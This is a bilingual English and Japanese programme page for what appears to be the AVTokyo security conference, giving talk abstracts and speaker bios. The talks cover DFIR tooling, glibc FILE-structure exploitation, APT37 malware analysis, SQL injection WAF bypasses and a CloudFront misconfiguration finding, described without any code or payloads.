スピーカー
/* No speaking simultaneous interpretation is available , however, we try to show the slides in both english & japanese as much as we can. */
/* [en] means English speaker, [ja] means Japanese speaker. */
[en] "TSURUGI Linux - the sharpest weapon in your DFIR arsenal"
Giovanni Rattaro
Tsurugi is an heavily customized Linux distribution designed to support your DFIR investigations, malware analysis and Open Sourced intelligence activities. This open source project will be officially presented and will bacame public at AvTokyo conference. During the talk other parallel projects for acquisition and for live forensics will be presented...
Giovanni Rattaro:
Giovanni 'Sug4r' Rattaro is a Senior IT security consultant at Openminded, a cybersecurity company based in Paris, Italian board member of old backtrack Linux project (now Kali Linux) and ex DEFT Linux staff.
Main interests: DFIR, Cyber Threat Intelligence, botnet hunter, pentest and Social Engineering.
Tsurugi Linux core developer.
[en] Open Source Intelligence using DeepWeb: Analysis of the correlation between malware and the open source
dasom kim & seunggi jeong
This presentation explains how to make the most of the open source and track the specific users Horangi R&D Team discover. Based on the open source of malicious users, such as users who mainly sell malware targeted at a specific company, users who sell data or personal information of users, and then visualize their activities, Analyze associativity.
Dasom Kim:
Dasom Kim is a researcher of CyberOps, Horangi Pte LTD. She is the last year student at Kyungil University and a member of the anti-forensic research club. Her research interests include digital forensics, offender profiling, anti-forensics (steganography) and virtual reality.
Seunggi JEONG:
Seunggi JEONG is a Lead CyberOps Engineer of CyberOps, Horangi Pte LTD.
[en] Play with FILE Structure - Yet Another Binary Exploit Technique
Angelboy
To fight against prevalent cyber threat, more mechanisms to protect operating systems have been proposed recently. Specifically, the approaches like DEP, ASLR, and RELRO are frequently applied on Linux to hinder memory corruption vulnerabilities. In other words, it is more difficult for adversaries to exploit bugs to undermine the system security.
In this session, we will propose a new attack technique that exploits the FILE structure in GNU C Library (Glibc), and introduce how to circumvent the protection adopted by modern operating systems. In more detail, we demonstrate the techniques to break data protection and launch remote code execution. Moreover, we explore the methodology to utilize different FILE structures for attack, the so called File Stream Oriented Programming.
Moreover, there are new mitigations in the latest version of Glibc recently, but we can still abuse the FILE structure by our new approaches.
Angelboy:
Angelboy is a member of chroot and 217 team. He is researching in linux binary exploitation, especially in heap related exploitation. He participated in a lot of ctf, such as HITB、DEFCON、Boston key party, won 2nd in DEFCON CTF 2017 and won 1st in Boston key party 2016, 2017 with HTICON CTF Team. He is also a speaker at conferences such as HITCON, VXCON and HITB.
[en] A mysterious watcher ? Red Eyes Group and their activities in South Korea
CHA Minseok(Jacky)
On January 31, 2018, KRCert warned users about the zero0day vulnerability within Adobe Flash Player (CVE-2018-4878). The first attack exploiting this vulnerability was made on Korean users in November 2017. It uses the Redoor malware to infect users in the last phase of the attack. DOGcall and ROKRAT are in the same family of this malware. Redoor is known to be the malware used in Hancom Hangul(a word processor of Korea) disguised as a fake New Year address by North Korea in January 2017. However, the first attack using this malware had occurred in the autumn of 2016.
Red Eyes Group, the hacking group behind the attack, is also referred to as ScarCruft, Group123, Ricochet Chollima, Reaper, and APT37. Their profile is being built slowly in the efforts of security vendors to gather, collate, and analyze the attacks. The attacks are known to be made in not only in Korea, but also in Vietnam, Japan, and the Middle East.
And the main target of attack in Korea seems to be North Korean defectors and human rights activists. Hancom Hangul is a word processor used widely within Korea, and it has been used in targeted attacks. Some of their attacks exploit the zero-day vulnerability of Adobe Flash.
In this presentation, I will talk about the group's attack method in South Korea, including attack targets based on the decoy document and the characteristics of the main malware. I will also use the information gained from the code to profile the developer, and compare the attack with a group which was active in 2015. There is a chance that this group has been active for longer than we thought.
CHA Minseok(Jacky):
CHA Minseok(Jacky) is a Senior Principal Malware Researcher at AhnLab. He joined AhnLab as a malware analyst in 1997.
He is a member of AVAR(Association of Anti-Virus Asia Researches) and a reporter for the WildList Organization International.
He has been appointed as a member of the Private/Public Cooperative Investigation Group and Cyber Expert Group in South Korea.
He is a speaker at security conferences, including AVAR Conference, CARO Workshop, CodeEngn, CodeGate, ISCR(International Symposium on Cybercrime Response) and so on.
When he has free time, he enjoys old video games and old anime.
[ja] 不都合な真実: Windows 10でRansomware Protectionを回避
Soya Aoyama
2017年5月のWannaCryのサイバー攻撃は、私たちの心の中でまだ新鮮です。このマルウェアは150カ国以上で数十万台のコンピュータを暗号化し、ダメにしました。
ランサムウェア対策として、Microsoftは「Windows 10 Fall Creators Update」に「Ransomware
protection」機能を導入しました。この機能はどのように機能するのでしょう?そして本当に効果的なのでしょうか?
この講演では、デモンストレーションビデオを通じて、 "Ransomware protection"の "Controlled folder
access"の動作原則について説明します。次に、この機能を回避するための要件と、この機能を非常に簡単に回避できることを示します。そして最後に、脆弱性の定義を再検討する必要があるのではないかとあなたに問いかけます。
Soya Aoyama:
富士通システム統合研究所のセキュリティ研究者。
Windowsのソフトウェア開発者として20年以上の経験を持ち、NDISドライバ、Bluetoothプロファイル、Winsockアプリケーションなどを開発。そして3年前にセキュリティに関する研究を開始。
過去にAVTOKYO、BSidesLV、GrrCON、ToorCon、DerbyConで講演。
[en] Farewell, WAF - Exploiting SQL Injection from Mutation to Polymorphism
Boik Su
In this talk, we'll not only go through the core ideas and concepts of the Web application firewall (WAF) and also some background information about mutation testing against web applications, but introduce a promising direction of automatically generating SQL Injection attacks with Polymorphism. We'll be giving out some case studies and bypasses for the ModSecurity's latest version (v3.1) alongside our demonstrations and explain why common detections cannot help in this place as well. The audience will then realize the power of this concept and the beauty of the SQL language after the talk.
Boik Su:
Syue-Siang Su (Boik) has four-year experience in Web development and actively using OSS to create and manage applications or gadgets for his research in Web Security. He has received some awards from CTFs, been the speaker at OSCON2018, AVTokyo 2017, Taiwan Modern Web 2017, and the lecturer at Taiwan HITCON Training and National Center for Cyber Security Technology.
* http://boik.com.tw/
[ja] オッカムの剃刀:フォレンジックの物語
白船(田中ザック/Isaac Mathis)
DFIRについての楽しいトークをします。
白船(田中ザック/Isaac Mathis):
大和セキュリティ勉強会の主催者 (@yamatosecurity)の主催者。元カーネギーメロン大学の研究員。SANS 504の講師。神戸デジタル・ラボ(KDL)のProactive Defense CTO。法竹奏者。プロレベルの庭師。
[ja] Building CTF: 幾千の失敗を超えて
Nomuken
CTFは非常に楽しいハッカーのコンテストとして知られています。特に日本ではSECCONが有名です。今回はどうやってCTFを運営するか、そしてそのCTFの運営での自分の失敗について話そうと思います。
Nomuken:
オタクです、ご注文はうさぎですか?と初音ミクが好きです。あとSECCONの実行委員会とかもやってます。
[ja] CloudFrontを眺めていたらやばそうなデータを見つけてしまった
尾﨑 光芳 / 白石 三晃 / 小峰 里美
Amazon CloudFrontはコンテンツ配信ネットワーク (CDN) サービスです。CloudFrontでは、コンテンツを高速に配信できるよう、また簡便なアクセスができるよう様々な設定項目が提供されています。しかしながら、その設定に不備があるとセキュリティの問題になるおそれがあります。
ペネトレーションテストの過程で、私達はCloudFront経由でのみアクセスできる奇妙なホストを見つけました。また、そのホストに、FTPサーバのホスト名や認証情報といった機密情報を何者かが保存していることを確認しました。このセッションでは、発見された事象を紹介するとともに、その原因の特定、また他に同様のホストがないか試した結果を紹介します。
尾﨑 光芳:
SecureWorks Japan セキュリティ診断チーム
白石 三晃:
SecureWorks Japan セキュリティ診断チーム
小峰 里美:
SecureWorks Japan セキュリティ診断チーム